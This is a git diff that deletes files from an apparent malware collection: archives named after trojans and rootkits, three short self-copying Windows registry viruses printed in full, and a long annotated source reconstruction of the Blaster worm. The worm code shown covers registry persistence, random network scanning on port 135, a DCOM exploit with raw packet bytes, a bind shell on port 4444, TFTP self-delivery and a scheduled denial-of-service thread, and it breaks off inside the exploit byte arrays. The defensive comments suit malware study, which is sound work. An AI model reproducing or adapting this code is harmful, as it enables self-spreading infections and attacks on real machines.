diff --git a/Win32/Adrena.7z b/Win32/Adrena.7z deleted file mode 100644 index a7fd6926..00000000 Binary files a/Win32/Adrena.7z and /dev/null differ diff --git a/Win32/Backdoor.Win32.Aryan.7z b/Win32/Backdoor.Win32.Aryan.7z deleted file mode 100644 index e54b3efe..00000000 Binary files a/Win32/Backdoor.Win32.Aryan.7z and /dev/null differ diff --git a/Win32/NytrojanByNytro.7z b/Win32/NytrojanByNytro.7z deleted file mode 100644 index a6def205..00000000 Binary files a/Win32/NytrojanByNytro.7z and /dev/null differ diff --git a/Win32/OminousRAT.7z b/Win32/OminousRAT.7z deleted file mode 100644 index 626e47a3..00000000 Binary files a/Win32/OminousRAT.7z and /dev/null differ diff --git a/Win32/PlutoniumByMr3amo.7z b/Win32/PlutoniumByMr3amo.7z deleted file mode 100644 index e6143d91..00000000 Binary files a/Win32/PlutoniumByMr3amo.7z and /dev/null differ diff --git a/Win32/RST.Trojan.7z b/Win32/RST.Trojan.7z deleted file mode 100644 index 473f3f56..00000000 Binary files a/Win32/RST.Trojan.7z and /dev/null differ diff --git a/Win32/UnnamedRootkit.7z b/Win32/UnnamedRootkit.7z deleted file mode 100644 index fa0b1d3d..00000000 Binary files a/Win32/UnnamedRootkit.7z and /dev/null differ diff --git a/Win32/VbsCrypterByTrojanHorce.7z b/Win32/VbsCrypterByTrojanHorce.7z deleted file mode 100644 index 97cd2577..00000000 Binary files a/Win32/VbsCrypterByTrojanHorce.7z and /dev/null differ diff --git a/Win32/Virus.WinREG.Antireg.b b/Win32/Virus.WinREG.Antireg.b deleted file mode 100644 index 02fe7cfd..00000000 --- a/Win32/Virus.WinREG.Antireg.b +++ /dev/null @@ -1,13 +0,0 @@ -REGEDIT4 - -;;-------------------------------;; -;; ;; -;; AntiREG (The First REG Virus) ;; -;; Coded By Lys Kovick ;; -;; Special Thanks To Phage ;; -;; ;; -;;-------------------------------;; - -[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] -@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" - diff --git a/Win32/Virus.WinREG.Sptohell b/Win32/Virus.WinREG.Sptohell deleted file mode 100644 index c7b96c44..00000000 --- a/Win32/Virus.WinREG.Sptohell +++ /dev/null @@ -1,24 +0,0 @@ -REGEDIT 4 - -;; WinREG.Wow -;; written by SeCoNd PaRt To HeLl -;; for my Virus Database - -[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] -@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" - -;; Wow -;; WowWow -;; WowWowWow -;; WowWowWowWow -;; WowWowWowWowWow -;; WowWowWowWowWowWow -;; WowWowWowWowWowWowWow -;; WowWowWowWowWowWowWowWow -;; WowWowWowWowWowWowWow -;; WowWowWowWowWowWow -;; WowWowWowWowWow -;; WowWowWowWow -;; WowWowWow -;; WowWow -;; Wow \ No newline at end of file diff --git a/Win32/Virus.WinREG.Sptohell.b b/Win32/Virus.WinREG.Sptohell.b deleted file mode 100644 index c2fca8c0..00000000 --- a/Win32/Virus.WinREG.Sptohell.b +++ /dev/null @@ -1,14 +0,0 @@ -REGEDIT 4 - -;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- *************** -;; -;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus -;; in any ezine before. And I think, much ppl don't know, that such viruses exist. -;; -;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every -;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies -;; itself (the code in the registry) to these .REG-files. - - -[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] -@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" \ No newline at end of file diff --git a/Win32/Win32.4HorseMan.a.7z b/Win32/Win32.4HorseMan.a.7z deleted file mode 100644 index f2f6e4a7..00000000 Binary files a/Win32/Win32.4HorseMan.a.7z and /dev/null differ diff --git a/Win32/Win32.4HorseMan.b.7z b/Win32/Win32.4HorseMan.b.7z deleted file mode 100644 index 19706f0e..00000000 Binary files a/Win32/Win32.4HorseMan.b.7z and /dev/null differ diff --git a/Win32/Win32.A59.7z b/Win32/Win32.A59.7z deleted file mode 100644 index b768d28c..00000000 Binary files a/Win32/Win32.A59.7z and /dev/null differ diff --git a/Win32/Win32.Acid.b.7z b/Win32/Win32.Acid.b.7z deleted file mode 100644 index e21c03ba..00000000 Binary files a/Win32/Win32.Acid.b.7z and /dev/null differ diff --git a/Win32/Win32.Ago.c.7z b/Win32/Win32.Ago.c.7z deleted file mode 100644 index f4eace90..00000000 Binary files a/Win32/Win32.Ago.c.7z and /dev/null differ diff --git a/Win32/Win32.Ak.7z b/Win32/Win32.Ak.7z deleted file mode 100644 index 4e780d61..00000000 Binary files a/Win32/Win32.Ak.7z and /dev/null differ diff --git a/Win32/Win32.Algus.f.7z b/Win32/Win32.Algus.f.7z deleted file mode 100644 index c10d0113..00000000 Binary files a/Win32/Win32.Algus.f.7z and /dev/null differ diff --git a/Win32/Win32.Beta.7z b/Win32/Win32.Beta.7z deleted file mode 100644 index 01aed72b..00000000 Binary files a/Win32/Win32.Beta.7z and /dev/null differ diff --git a/Win32/Win32.BlackDream.7z b/Win32/Win32.BlackDream.7z deleted file mode 100644 index 3387fe32..00000000 Binary files a/Win32/Win32.BlackDream.7z and /dev/null differ diff --git a/Win32/Win32.Blaster.cpp b/Win32/Win32.Blaster.cpp deleted file mode 100644 index a906d19c..00000000 --- a/Win32/Win32.Blaster.cpp +++ /dev/null @@ -1,1351 +0,0 @@ -#include -#include /*IP_HDRINCL*/ -#include /*InternetGetConnectedState*/ -#include - -#pragma comment (lib, "ws2_32.lib") -#pragma comment (lib, "wininet.lib") -#pragma comment (lib, "advapi32.lib") - - -/* -* These strings aren't used in the worm, Buford put them here -* so that whitehat researchers would discover them. -* BUFORD: Note that both of these messages are the typical -* behavior of a teenager who recently discovered love, and -* is in the normal teenage mode of challenging authority. -*/ -const char msg1[]="I just want to say LOVE YOU SAN!!"; -const char msg2[]="billy gates why do you make this possible ?" -" Stop making money and fix your software!!"; - - -/* -* Buford probably put the worm name as a "define" at the top -* of his program so that he could change the name at any time. -* 2003-09-29: This is the string that Parson changed. -*/ -#define MSBLAST_EXE "msblast.exe" - -/* -* MS-RPC/DCOM runs over port 135. -* DEFENSE: firewalling port 135 will prevent systems from -* being exploited and will hinder the spread of this worm. -*/ -#define MSRCP_PORT_135 135 - -/* -* The TFTP protocol is defined to run on port 69. Once this -* worm breaks into a victim, it will command it to download -* the worm via TFTP. Therefore, the worms briefly runs a -* TFTP service to deliver that file. -* DEFENSE: firewalling 69/udp will prevent the worm from -* fully infected a host. -*/ -#define TFTP_PORT_69 69 - -/* -* The shell-prompt is established over port 4444. The -* exploit code (in the variable 'sc') commands the victim -* to "bind a shell" on this port. The exploit then connects -* to that port to send commands, such as TFTPing the -* msblast.exe file down and launching it. -* DEFENSE: firewalling 4444/tcp will prevent the worm from -* spreading. -*/ -#define SHELL_PORT_4444 4444 - - -/* -* A simple string to hold the current IP address -*/ -char target_ip_string[16]; - -/* -* A global variable to hold the socket for the TFTP service. -*/ -int fd_tftp_service; - -/* -* Global flag to indicate this thread is running. This -* is set when the thread starts, then is cleared when -* the thread is about to end. -* This demonstrates that Buford isn't confident with -* multi-threaded programming -- he should just check -* the thread handle. -*/ -int is_tftp_running; - -/* -* When delivering the worm file to the victim, it gets the -* name by querying itself using GetModuleFilename(). This -* makes it easier to change the filename or to launch the -* worm. */ -char msblast_filename[256+4]; - -int ClassD, ClassC, ClassB, ClassA; - -int local_class_a, local_class_b; - -int winxp1_or_win2k2; - - -ULONG WINAPI blaster_DoS_thread(LPVOID); -void blaster_spreader(); -void blaster_exploit_target(int fd, const char *victim_ip); -void blaster_send_syn_packet(int target_ip, int fd); - - -/*************************************************************** -* This is where the 'msblast.exe' program starts running -***************************************************************/ -void main(int argc, char *argv[]) -{ -WSADATA WSAData; -char myhostname[512]; -char daystring[3]; -char monthstring[3]; -HKEY hKey; -int ThreadId; -register unsigned long scan_local=0; - -/* -* Create a registry key that will cause this worm -* to run every time the system restarts. -* DEFENSE: Slammer was "memory-resident" and could -* be cleaned by simply rebooting the machine. -* Cleaning this worm requires this registry entry -* to be deleted. -*/ -RegCreateKeyEx( -/*hKey*/ HKEY_LOCAL_MACHINE, -/*lpSubKey*/ "SOFTWARE\\Microsoft\\Windows\\" -"CurrentVersion\\Run", -/*Reserved*/ 0, -/*lpClass*/ NULL, -/*dwOptions*/ REG_OPTION_NON_VOLATILE, -/*samDesired */ KEY_ALL_ACCESS, -/*lpSecurityAttributes*/ NULL, -/*phkResult */ &hKey, -/*lpdwDisposition */ 0); -RegSetValueExA( -hKey, -"windows auto update", -0, -REG_SZ, -MSBLAST_EXE, -50); -RegCloseKey(hKey); - - -/* -* Make sure this isn't a second infection. A common problem -* with worms is that they sometimes re-infect the same -* victim repeatedly, eventually crashing it. A crashed -* system cannot spread the worm. Therefore, worm writers -* now make sure to prevent reinfections. The way Blaster -* does this is by creating a system "global" object called -* "BILLY". If another program in the computer has already -* created "BILLY", then this instance won't run. -* DEFENSE: this implies that you can remove Blaster by -* creating a mutex named "BILLY". When the computer -* restarts, Blaster will falsely believe that it has -* already infected the system and will quit. -*/ -CreateMutexA(NULL, TRUE, "BILLY"); -if (GetLastError() == ERROR_ALREADY_EXISTS) -ExitProcess(0); - -/* -* Windows systems requires "WinSock" (the network API layer) -* to be initialized. Note that the SYNflood attack requires -* raw sockets to be initialized, which only works in -* version 2.2 of WinSock. -* BUFORD: The following initialization is needlessly -* complicated, and is typical of programmers who are unsure -* of their knowledge of sockets.. -*/ -if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0 -&& WSAStartup(MAKEWORD(1,1), &WSAData) != 0 -&& WSAStartup(1, &WSAData) != 0) -return; - -/* -* The worm needs to read itself from the disk when -* transferring to the victim. Rather than using a hard-coded -* location, it discovered the location of itself dynamically -* through this function call. This has the side effect of -* making it easier to change the name of the worm, as well -* as making it easier to launch it. -*/ -GetModuleFileNameA(NULL, msblast_filename, -sizeof(msblast_filename)); - -/* -* When the worm infects a dialup machine, every time the user -* restarts their machine, the worm's network communication -* will cause annoying 'dial' popups for the user. This will -* make them suspect their machine is infected. -* The function call below makes sure that the worm only -* starts running once the connection to the Internet -* has been established and not before. -* BUFORD: I think Buford tested out his code on a machine -* and discovered this problem. Even though much of the -* code indicates he didn't spend much time on -* testing his worm, this line indicates that he did -* at least a little bit of testing. -*/ -while (!InternetGetConnectedState(&ThreadId, 0)) -Sleep (20000); /*wait 20 seconds and try again */ - -/* -* Initialize the low-order byte of target IP address to 0. -*/ -ClassD = 0; - -/* -* The worm must make decisions "randomly": each worm must -* choose different systems to infect. In order to make -* random choices, the programmer must "seed" the random -* number generator. The typical way to do this is by -* seeding it with the current timestamp. -* BUFORD: Later in this code you'll find that Buford calls -* 'srand()' many times to reseed. This is largely -* unnecessary, and again indicates that Buford is not -* confident in his programming skills, so he constantly -* reseeds the generator in order to make extra sure he -* has gotten it right. -*/ -srand(GetTickCount()); - -/* -* This initializes the "local" network to some random -* value. The code below will attempt to figure out what -* the true local network is -- but just in case it fails, -* the initialization fails, using random values makes sure -* the worm won't do something stupid, such as scan the -* network around 0.0.0.0 -*/ -local_class_a = (rand() % 254)+1; -local_class_b = (rand() % 254)+1; - -/* -* This discovers the local IP address used currently by this -* victim machine. Blaster randomly chooses to either infect -* just the local ClassB network, or some other network, -* therefore it needs to know the local network. -* BUFORD: The worm writer uses a complex way to print out -* the IP address into a string, then parse it back again -* to a number. This demonstrates that Buford is fairly -* new to C programming: he thinks in terms of the printed -* representation of the IP address rather than in its -* binary form. -*/ -if (gethostname(myhostname, sizeof(myhostname)) != -1) { -HOSTENT *p_hostent = gethostbyname(myhostname); - -if (p_hostent != NULL && p_hostent->h_addr != NULL) { -struct in_addr in; -const char *p_addr_item; - -memcpy(&in, p_hostent->h_addr, sizeof(in)); -sprintf(myhostname, "%s", inet_ntoa(in)); - -p_addr_item = strtok(myhostname, "."); -ClassA = atoi(p_addr_item); - -p_addr_item = strtok(0, "."); -ClassB = atoi(p_addr_item); - -p_addr_item = strtok(0, "."); -ClassC = atoi(p_addr_item); - -if (ClassC > 20) { -/* When starting from victim's address range, -* try to start a little bit behind. This is -* important because the scanning logic only -* move forward. */ -srand(GetTickCount()); -ClassC -= (rand() % 20); -} -local_class_a = ClassA; -local_class_b = ClassB; -scan_local = TRUE; -} -} - - -/* -* This chooses whether Blaster will scan just the local -* network (40% chance) or a random network (60% chance) -*/ -srand(GetTickCount()); -if ((rand() % 20) < 12) -scan_local = FALSE; - -/* -* The known exploits require the hacker to indicate whether -* the victim is WinXP or Win2k. The worm has to guess. The -* way it guesses is that it chooses randomly. 80% of the time -* it will assume that all victims are WinXP, and 20% of the -* time it will assume all victims are Win2k. This means that -* propogation among Win2k machines will be slowed down by -* the fact Win2k machines are getting DoSed faster than they -* are getting exploited. -*/ -winxp1_or_win2k2 = 1; -if ((rand()%10) > 7) -winxp1_or_win2k2 = 2; - -/* -* If not scanning locally, then choose a random IP address -* to start with. -* BUG: this worm choose bad ranges above 224. This will -* cause a bunch of unnecessary multicast traffic. Weird -* multicast traffic has historically been an easy way of -* detecting worm activity. -*/ -if (!scan_local) { -ClassA = (rand() % 254)+1; -ClassB = (rand() % 254); -ClassC = (rand() % 254); -} - - -/* -* Check the date so that when in the certain range, it will -* trigger a DoS attack against Micosoft. The following -* times will trigger the DoS attack: -* Aug 16 through Aug 31 -* Spt 16 through Spt 30 -* Oct 16 through Oct 31 -* Nov 16 through Nov 30 -* Dec 16 through Dec 31 -* This applies to all years, and is based on local time. -* FAQ: The worm is based on "local", not "global" time. -* That means the DoS attack will start from Japan, -* then Asia, then Europe, then the United States as the -* time moves across the globe. -*/ -#define MYLANG MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT) -#define LOCALE_409 MAKELCID(MYLANG, SORT_DEFAULT) -GetDateFormat( LOCALE_409, -0, -NULL, /*localtime, not GMT*/ -"d", -daystring, -sizeof(daystring)); -GetDateFormat( LOCALE_409, -0, -NULL, /*localtime, not GMT*/ -"M", -monthstring, -sizeof(monthstring)); -if (atoi(daystring) > 15 && atoi(monthstring) > 8) -CreateThread(NULL, 0, -blaster_DoS_thread, -0, 0, &ThreadId); - -/* -* As the final task of the program, go into worm mode -* trying to infect systems. -*/ -for (;;) -blaster_spreader(); - -/* -* It'll never reach this point, but in theory, you need a -* WSACleanup() after a WSAStartup(). -*/ -WSACleanup(); -} - - - -/* -* This will be called from CreateThread in the main worm body -* right after it connects to port 4444. After the thread is -* started, it then sends the string " -* tftp -i %d.%d.%d.%d GET msblast.exe" (where the %ds represents -* the IP address of the attacker). -* Once it sends the string, it then waits for 20 seconds for the -* TFTP server to end. If the TFTP server doesn't end, it calls -* TerminateThread. -*/ -DWORD WINAPI blaster_tftp_thread(LPVOID p) -{ -/* -* This is the protocol format of a TFTP packet. This isn't -* used in the code -- I just provide it here for reference -*/ -struct TFTP_Packet -{ -short opcode; -short block_id; -char data[512]; -}; - -char reqbuf[512]; /* request packet buffer */ -struct sockaddr_in server; /* server-side port number */ -struct sockaddr_in client; /* client IP address and port */ -int sizeof_client; /* size of the client structure*/ -char rspbuf[512]; /* response packet */ - -static int fd; /* the socket for the server*/ -register FILE *fp; -register block_id; -register int block_size; - -/* Set a flag indicating this thread is running. The other -* thread will check this for 20 seconds to see if the TFTP -* service is still alive. If this thread is still alive in -* 20 seconds, it will be killed. -*/ -is_tftp_running = TRUE; /*1 == TRUE*/ - -/* Create a server-socket to listen for UDP requests on */ -fd = socket(AF_INET, SOCK_DGRAM, 0); -if (fd == SOCKET_ERROR) -goto closesocket_and_exit; - -/* Bind the socket to 69/udp */ -memset(&server, 0, sizeof(server)); -server.sin_family = AF_INET; -server.sin_port = htons(TFTP_PORT_69); -server.sin_addr.s_addr = 0; /*TFTP server addr = */ -if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0) -goto closesocket_and_exit; - -/* Receive a packet, any packet. The contents of the received -* packet are ignored. This means, BTW, that a defensive -* "worm-kill" could send a packet from somewhere else. This -* will cause the TFTP server to download the msblast.exe -* file to the wrong location, preventing the victim from -* doing the download. */ -sizeof_client = sizeof(client); -if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0, -(struct sockaddr*)&client, &sizeof_client) <= 0) -goto closesocket_and_exit; - -/* The TFTP server will respond with many 512 byte blocks -* until it has completely sent the file; each block must -* have a unique ID, and each block must be acknowledged. -* BUFORD: The worm ignores TFTP ACKs. This is probably why -* the worm restarts the TFTP service rather than leaving it -* enabled: it essentially flushes all the ACKs from the -* the incoming packet queue. If the ACKs aren't flushed, -* the worm will incorrectly treat them as TFTP requests. -*/ -block_id = 0; - -/* Open this file. GetModuleFilename was used to figure out -* this filename. */ -fp = fopen(msblast_filename, "rb"); -if (fp == NULL) -goto closesocket_and_exit; - -/* Continue sending file fragments until none are left */ -for (;;) { -block_id++; - -/* Build TFTP header */ -#define TFTP_OPCODE_DATA 3 -*(short*)(rspbuf+0) = htons(TFTP_OPCODE_DATA); -*(short*)(rspbuf+2)= htons((short)block_id); - -/* Read next block of data (about 12 blocks total need -* to be read) */ -block_size = fread(rspbuf+4, 1, 512, fp); - -/* Increase the effective length to include the TFTP -* head built above */ -block_size += 4; - -/* Send this block */ -if (sendto(fd, (char*)&rspbuf, block_size, -0, (struct sockaddr*)&client, sizeof_client) <= 0) -break; - -/* Sleep for a bit. -* The reason for this is because the worm doesn't care -* about retransmits -- it therefore must send these -* packets slow enough so congestion doesn't drop them. -* If it misses a packet, then it will DoS the victim -* without actually infecting it. Worse: the intended -* victim will continue to send packets, preventing the -* worm from infecting new systems because the -* requests will misdirect TFTP. This design is very -* bad, and is my bet as the biggest single factor -* that slows down the worm. */ -Sleep(900); - -/* File transfer ends when the last block is read, which -* will likely be smaller than a full-sized block*/ -if (block_size != sizeof(rspbuf)) { -fclose(fp); -fp = NULL; -break; -} -} - -if (fp != NULL) -fclose(fp); - -closesocket_and_exit: - -/* Notify that the thread has stopped, so that the waiting -* thread can continue on */ -is_tftp_running = FALSE; -closesocket(fd); -ExitThread(0); - -return 0; -} - - - - -/* -* This function increments the IP address. -* BUFORD: This conversion from numbers, to strings, then back -* to number is overly complicated. Experienced programmers -* would simply store the number and increment it. This shows -* that Buford does not have much experience work with -* IP addresses. -*/ -void blaster_increment_ip_address() -{ -for (;;) { -if (ClassD <= 254) { -ClassD++; -return; -} - -ClassD = 0; -ClassC++; -if (ClassC <= 254) -return; -ClassC = 0; -ClassB++; -if (ClassB <= 254) -return; -ClassB = 0; -ClassA++; -if (ClassA <= 254) -continue; -ClassA = 0; -return; -} -} - - -/* -* This is called from the main() function in an -* infinite loop. It scans the next 20 addresses, -* then exits. -*/ -void blaster_spreader() -{ -fd_set writefds; - -register int i; -struct sockaddr_in sin; -struct sockaddr_in peer; -int sizeof_peer; -int sockarray[20]; -int opt = 1; -const char *victim_ip; - -/* Create the beginnings of a "socket-address" structure that -* will be used repeatedly below on the 'connect()' call for -* each socket. This structure specified port 135, which is -* the port used for RPC/DCOM. */ -memset(&sin, 0, sizeof(sin)); -sin.sin_family = AF_INET; -sin.sin_port = htons(MSRCP_PORT_135); - -/* Create an array of 20 socket descriptors */ -for (i=0; i<20; i++) { -sockarray[i] = socket(AF_INET, SOCK_STREAM, 0); -if (sockarray[i] == -1) -return; -ioctlsocket(sockarray[i], FIONBIO , &opt); -} - -/* Initiate a "non-blocking" connection on all 20 sockets -* that were created above. -* FAQ: Essentially, this means that the worm has 20 -* "threads" -- even though they aren't true threads. -*/ -for (i=0; i<20; i++) { -int ip; - -blaster_increment_ip_address(); -sprintf(target_ip_string, "%i.%i.%i.%i", -ClassA, ClassB, ClassC, ClassD); - -ip = inet_addr(target_ip_string); -if (ip == -1) -return; -sin.sin_addr.s_addr = ip; -connect(sockarray[i],(struct sockaddr*)&sin,sizeof(sin)); -} - -/* Wait 1.8-seconds for a connection. -* BUG: this is often not enough, especially when a packet -* is lost due to congestion. A small timeout actually makes -* the worm slower than faster */ -Sleep(1800); - -/* Now test to see which of those 20 connections succeeded. -* BUFORD: a more experienced programmer would have done -* a single 'select()' across all sockets rather than -* repeated calls for each socket. */ -for (i=0; i<20; i++) { -struct timeval timeout; -int nfds; - -timeout.tv_sec = 0; -timeout.tv_usec = 0; -nfds = 0; - -FD_ZERO(&writefds); -FD_SET((unsigned)sockarray[i], &writefds); - -if (select(0, NULL, &writefds, NULL, &timeout) != 1) { -closesocket(sockarray[i]); -} else { -sizeof_peer = sizeof(peer); -getpeername(sockarray[i], -(struct sockaddr*)&peer, &sizeof_peer); -victim_ip = inet_ntoa(peer.sin_addr); - -/* If connection succeeds, exploit the victim */ -blaster_exploit_target(sockarray[i], victim_ip); -closesocket(sockarray[i]); -} -} - -} - -/* -* This is where the victim is actually exploited. It is the same -* exploit as created by xfocus and altered by HDMoore. -* There are a couple of differences. The first is that the in -* those older exploits, this function itself would create the -* socket and connect, whereas in Blaster, the socket is already -* connected to the victim via the scanning function above. The -* second difference is that the packets/shellcode blocks are -* declared as stack variables rather than as static globals. -* Finally, whereas the older exploits give the hacker a -* "shell prompt", this one automates usage of the shell-prompt -* to tell the victim to TFTP the worm down and run it. -*/ -void blaster_exploit_target(int sock, const char *victim_ip) -{ - -/* These blocks of data are just the same ones copied from the -* xfocus exploit prototype. Whereas the original exploit -* declared these as "static" variables, Blaster declares -* these as "stack" variables. This is because the xfocus -* exploit altered them -- they must be reset back to their -* original values every time. */ -unsigned char bindstr[]={ -0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, - -0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, - -0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, -0x00,0x00,0x00,0x00, -0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, -0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; - - - -unsigned char request1[]={ -0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 -,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 - -,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 - -,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E - -,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D - -,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 - -,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 - -,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 - -,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 - -,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 - -,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 - -,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 - -,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 - -,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 - -,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF - -,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 - -,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 - -,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 - -,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 - -,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 - -,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 - -,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 - -,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 - -,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 - -,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E - -,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 - -,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 - -,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 - 